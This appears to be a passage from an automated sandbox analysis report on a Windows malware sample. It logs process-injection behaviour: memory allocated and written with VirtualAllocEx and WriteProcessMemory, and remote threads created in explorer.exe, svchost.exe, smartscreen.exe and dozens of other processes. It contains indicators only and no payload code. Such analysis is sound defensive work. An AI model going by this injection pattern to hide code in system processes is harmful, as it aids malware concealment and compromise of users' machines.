            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2CE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 28C0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1220000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 900000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 28F0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2820000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F20000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: BE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2D80000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: E30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: A60000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 29B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 540000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B70000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: EE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Memory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 740000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Code function: 2_2_03390DE0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread
            Source: C:\Windows\explorer.exe Code function: 3_2_01341F8D VirtualAllocEx,WriteProcessMemory,CreateRemoteThread
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\explorer.exe EIP: 13408B3
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\sihost.exe EIP: AC090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\svchost.exe EIP: 91090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9A090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\ctfmon.exe EIP: A5090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\explorer.exe EIP: 137090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\svchost.exe EIP: D4090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe EIP: B5090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 11090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe EIP: A9090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: AB090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\smartscreen.exe EIP: 29090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe EIP: 58090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 90090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\ApplicationFrameHost.exe EIP: 18090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe EIP: A1090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 19090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\ImmersiveControlPanel\SystemSettings.exe EIP: F1090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\oobe\UserOOBEBroker.exe EIP: 1090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\svchost.exe EIP: D090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\dllhost.exe EIP: 26090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\SysWOW64\cscript.exe EIP: 4D8090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\conhost.exe EIP: 88090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\conhost.exe EIP: 90090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\backgroundTaskHost.exe EIP: C5090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 89090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 153090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 277090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: B8090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 8B090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: B5090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 2EB090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 2D1090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 2B4090B
            Source: C:\Windows\SysWOW64\winver.exe Thread created: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe EIP: 2E2090B
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: BE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2CA090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: C4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 112090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2F4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2F6090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 307090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 14D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 161090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2C9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: CC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 66090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 14B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 101090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: D9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 6E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 93090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 236090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 97090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 105090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 7B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 102090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 9C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 85090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AA090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: CE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 20E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 68090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 287090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2CC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 5A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2C6090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 12F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 228090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 1A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 60090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 104090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2C9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 124090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: FD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: AE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 238090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B8090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 7F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2DD090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2F3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 120090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2CE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 28C090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 122090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 90090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 28F090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 282090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: F2090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: BE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 2D8090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: E3090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: A6090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 29B090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 54090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: B7090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: EE090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: unknown EIP: 74090BJump to behavior
            Source: C:\Windows\explorer.exeThread created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe EIP: 1C090BJump to behavior
            Source: C:\Windows\explorer.exeThread created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe EIP: 1C090BJump to behavior
Source: C:\Windows\SysWOW64\winver.exe | Memory written: PID: 2580 | base: 1340000 | value: 50
Source: C:\Windows\SysWOW64\winver.exe | Memory written: PID: 2580 | base: 1370000 | value: 50
Source: C:\Users\user\Desktop\java.exe | Memory written: C:\Windows\SysWOW64\winver.exe | base: 3318B0
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\explorer.exe | base: 1340000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\sihost.exe | base: AC0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\svchost.exe | base: 910000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\svchost.exe | base: 9A0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\ctfmon.exe | base: A50000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\explorer.exe | base: 1370000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\svchost.exe | base: D40000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | base: B50000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe | base: 110000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | base: A90000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe | base: AB0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\smartscreen.exe | base: 290000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | base: 580000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe | base: 3D0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe | base: 900000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe | base: 180000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe | base: A10000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe | base: 190000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe | base: F10000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe | base: 10000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\svchost.exe | base: D0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\dllhost.exe | base: 260000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\SysWOW64\cscript.exe | base: 4D80000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\conhost.exe | base: 880000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\conhost.exe | base: 900000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\backgroundTaskHost.exe | base: C50000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe | base: 890000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe | base: 30000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1530000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2770000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B80000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 8B0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B50000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2EB0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2D10000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2B40000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2E20000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: BE0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2CA0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: C40000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1120000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2F40000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: F90000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B30000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2F60000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 3070000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 14D0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B90000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: B70000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 1610000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 2C90000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: CC0000
Source: C:\Windows\SysWOW64\winver.exe | Memory written: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe | base: 660000
